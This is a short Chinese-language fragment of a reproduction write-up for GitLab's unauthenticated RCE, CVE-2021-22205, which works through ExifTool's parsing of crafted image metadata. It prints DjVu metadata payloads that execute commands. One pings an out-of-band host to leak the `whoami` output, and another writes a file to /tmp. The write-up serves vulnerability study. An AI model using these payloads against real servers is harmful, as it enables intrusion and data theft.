snippet
"Attach a file"
; Select and uplaod echo_vakzz.jpgecho_vakzz.jpg
上传附件也可以通过未授权RCE,具体可以查看(CVE-2021-22205)RCE - 七、手工复现-未授权
制作rce图片可直接编辑,修改下面的代码就好;或者上面的文章中
[六、手工复现-有授权 - 2 DjVu格式图片制作方式]
也有相应的制作方法。
qx{ping `whoami`.5pxha.i3ntq7.bnslog.top}
如作者在报告里所说:
[jpg|jpeg|tiff]
through to ExifTool to remove any non-whitelisted tags.GitLab Workhorse
会将任何扩展名为 jpg|jpeg|tiff
的文件传递给 ExifTool
,以删除任何未列入白名单的标签。func IsExifFile(filename string) bool {
filenameMatch := regexp.MustCompile(`(?i)\.(jpg|jpeg|tiff)$`)
return filenameMatch.MatchString(filename)
}
(metadata
(Copyright "\
" . qx{echo vakzz >/tmp/vakzz} . \
" b ") )